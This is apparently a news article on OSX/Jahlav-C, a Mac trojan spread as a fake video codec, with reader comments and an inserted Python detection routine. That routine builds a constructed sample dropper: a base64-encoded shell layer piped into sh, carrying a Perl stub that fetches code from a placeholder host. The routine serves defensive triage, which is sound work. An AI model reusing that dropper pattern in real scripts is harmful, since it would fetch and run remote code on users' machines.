Mac OS X malware posing as fake video codec discovered
Summary: Researchers from ParetoLogic are reporting on a newly discovered Mac OS X malware variant posing as a fake video ActiveX object found at a bogus Macintosh PornTube site. The use of fake video codecs is a social engineering tactic so far used exclusively by malware targeting Windows, and seeing it used in a Mac OS X-based malware attack proves that successful social engineering approaches remain OS independent.
Researchers from ParetoLogic are reporting on a newly discovered Mac OS X malware variant posing as a fake video ActiveX object found at a bogus Macintosh PornTube site.
The use of fake video codecs is a social engineering tactic so far used exclusively by malware targeting Windows, and seeing it used in a Mac OS X-based malware attack proves that successful social engineering approaches remain OS independent.
Prior to ParetoLogic's sample, SophosLabs appears to have received an email from the author of last month's discovered OSX/Tored-A sample, allowing them to add generic detection for any upcoming releases.
Here are some of the PornTube templates used in the social engineering attack, a description of the malware, as well as the descriptive filenames used in some of the campaigns:
OSX/Jahlav-C is described as:
"OSX/Jahlav-C is a Trojan created for the Mac OS X operating system. The initial malicious installer is distributed as a missing Video ActiveX Object.
As a part of the installation a malicious shell script file AdobeFlash is created in the /Library/Internet Plug-Ins folder and set up to run periodically. The script contains another shell script in an encoded format which in turn contains a Perl script with the main malicious payload. The Perl script uses HTTP to communicate with a remote website and download code supplied by the attacker."
The campaign is also using descriptive file names such as HDTVPlayerv3.5.dmg, VideoCodec.dmg, FlashPlayer.dmg, MacTubePlayer.dmg, macvideo.dmg, License.v.3.413.dmg, play-video.dmg and QuickTime.dmg.
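The Sophos description above gives a defender three things to look for: a dropper at a fixed path that is run periodically, a shell layer hidden behind encoding, and a Perl script inside that layer that fetches more code over HTTP. The triage routine below, an added example rather than anything from the article or from Sophos, peels nested encoded layers out of a suspect script and reports which of those traits are present; the base64 encoding, the `openssl base64` decode step, the cron-based scheduling and the `c2.example.invalid` host are assumptions, and the sample dropper is constructed for the demonstration.

```python
import base64
import re

# Path and file name given in the Sophos description quoted above.
DROPPER_PATH = "/Library/Internet Plug-Ins/AdobeFlash"

# Constructed sample, not a real Jahlav dropper: a Perl stub that fetches a URL
# from a placeholder host, wrapped in a shell script that is base64-encoded into
# the outer script. Base64 is an assumption; the page only says "encoded format".
INNER_SH = ("#!/bin/sh\ncat > /tmp/p.pl <<'EOF'\n#!/usr/bin/perl\nuse LWP::Simple;\n"
            "my $r = get('http://c2.example.invalid/u');\nEOF\nperl /tmp/p.pl\n")
OUTER_SH = ("#!/bin/sh\necho '" + base64.b64encode(INNER_SH.encode()).decode()
            + "' | openssl base64 -d | sh\n")
SAMPLE_CRONTAB = "# constructed crontab\n*/5 * * * * '%s'\n" % DROPPER_PATH

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # a long base64 blob

def peel_layers(text, max_depth=4):
    """Decode nested base64 blobs; return every layer, outermost first."""
    layers = [text]
    for _ in range(max_depth):
        m = B64_RUN.search(layers[-1])
        if not m:
            break
        try:
            layers.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            break
    return layers

def triage(script_text, crontab_text):
    """Return the set of indicators that match the behaviour described for Jahlav-C."""
    layers = peel_layers(script_text)
    inner = "\n".join(layers[1:])  # everything that was hidden behind encoding
    findings = set()
    if inner and re.search(r"\b(sh|bash)\b", layers[0]):
        findings.add("encoded-shell-layer")   # encoded blob piped into a shell
    if re.search(r"\bperl\b", inner):
        findings.add("perl-payload")          # Perl script carried inside
    if re.search(r"https?://|LWP::|HTTP::", inner):
        findings.add("http-download")         # reaches out over HTTP for more code
    for line in crontab_text.splitlines():
        if not line.lstrip().startswith("#") and DROPPER_PATH in line:
            findings.add("cron-persistence")  # periodic execution of the dropper
    return findings
```

On a live system the inputs would be the contents of the file at `DROPPER_PATH` and the output of `crontab -l` for each user; a launchd plist referencing the same path would be the other scheduling mechanism to check.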
What's Apple's take on this emerging trend?
Earlier this week, in a rare comment on potential Mac OS X insecurities in the face of malware, the company not only acknowledged OS X malware but also pointed out that:
"The Mac is designed with built-in technologies that provide protection against malicious software and security threats right out of the box. However, since no system can be 100 percent immune from every threat, antivirus software may offer additional protection."
Is the company finally making the right decision to generate security awareness of a threat that is likely to become a daily routine in the long term, or was it too slow to stop using the Mac's massively advertised immunity to malware as a key differentiating factor?
What do you think?
Talkback.
Talkback
The Apple dilemma
Publicly admitting that OSX is far from immune to malware will muddle the simplistic PR message that "Macs don't get viruses".
They are unscrupulously balancing that act at the moment. They know that it is only a matter of time before something serious hits the OSX community. From there on they cannot use that PR tool any more.
The criminals behind this fake codec have clearly demonstrated intent. They have the malware code prepared. Rest assured that the Java Data class deserialization bug has their attention.
Compared to a fake codec, exploiting the Java bug is just a short jump.
But
That's true. And as we've seen with Windows people are all too trusting...
1. Use safe computing habits including knowing the source of the software you're about to install.
2. Use A/V software.
Unfortunately the reality is option one is asking too much from users so option two is typically employed.
You're right.
The problem...
hmm...
Isn't that the implied result of honeymonster's OP?
Why yes, yes it is. Which is why I said:
@ye
That is not what I said
But I do believe that many OSX users have grown complacent as a result of Apple marketing. There's plenty of evidence of that in the comments sections on this site.
What is interesting about this attack - as opposed to the previous ones - is that it appears that the attacker(s) actually invested some time in this. The previous attacks had all the marks of being amateurish attempts.
When the well-established and highly skilled attackers start migrating over from the Windows platform, that's when the disaster will strike. Certainly the Java bug has the potential for that.
Is that not the conclusion you were attempting to imply?
Problem is....
See this post of mine:
I agree.....
We're moving to McAfee and...
I'm a Mac user...
Speaking for Mac users??
I never download anything unless I go to a site I trust, which is few. Messages to update only serve to motivate me to go to the appropriate site without clicking on an automatically generated message to begin a download.
When web surfing, I pay attention to my hard drive. If it becomes active when I don't think it should be, I quit the browser. If the browser won't quit, I'll pull the plug. As often as possible, I also spend the extra money for a disk, instead of downloading updates.
I don't consider myself 100% impervious to these problems, but in 24 years, I've never had a virus or Trojan. Perhaps it's because some of us Mac users actually are quite careful.
Human Behavior
You are right in implying one would need to do a poll to prove poor security behavior of Mac users. You would also have to do a poll to prove the average Mac users are more computer literate than the average PC user. Without proof of either, the typical human behavior must be assumed to be true. Your argument is based on an average person's behavior being different from behavior that has a widespread proven track record. The burden of proof is on you to prove a difference in behavior of Mac users over PC. You need to show why the proven track record is incorrect. In this case present some evidence the average Mac user's behavior is different in security practices than the average PC user's. Otherwise the underlying argument that there are huge security land mines waiting to go off on Macs stands true.
Consider using SRP
And then you list using safe computing habits / user education, and security software.
Here's another: use low-rights user accounts in combination with Software Restriction Policy, if your version of Windows features SRP. XP Home and Vista Home editions don't have SRP, but XP Pro/MCE and Vista Business/Ultimate/Enterprise do. With SRP set to disallowed-by-default, the only executable files your users can execute are the ones the Admin put on the system. And if they don't have Admin rights, that pretty much settles things: Trojans will be arbitrarily prevented from execution. So will exploit payloads. So will AutoRun malware. So will unauthorized portable apps. No license fees, no renewals, no signature updates, and in an AD domain, no need to go set it up manually. Just configure it via Group Policy.
Here's one way you can set up SRP: http://www.mechbgon.com/srp If you want the official Microsoft page for further options, see http://technet.microsoft.com/en-us/windows/cc507878.aspx
Not entirely true
The attacker can also "blend" with a local privilege escalation bug and then he has root. No questions asked. There have been plenty of privilege escalation bugs and there are probably many more.
This is far easier on operating system / browser combinations without sandboxing. OSX doesn't feature sandboxing. Chrome will probably have a sandbox when launched for OSX.
Not really
Well, where is it? A couple of fake trojans aren't going anything.
You have to realize that a large number of Mac users are switchers, and coming from Windows they do have the basic experience required to avoid this simple kind of malware. Fortunately, malware under OS X is not as automated as it is for Windows.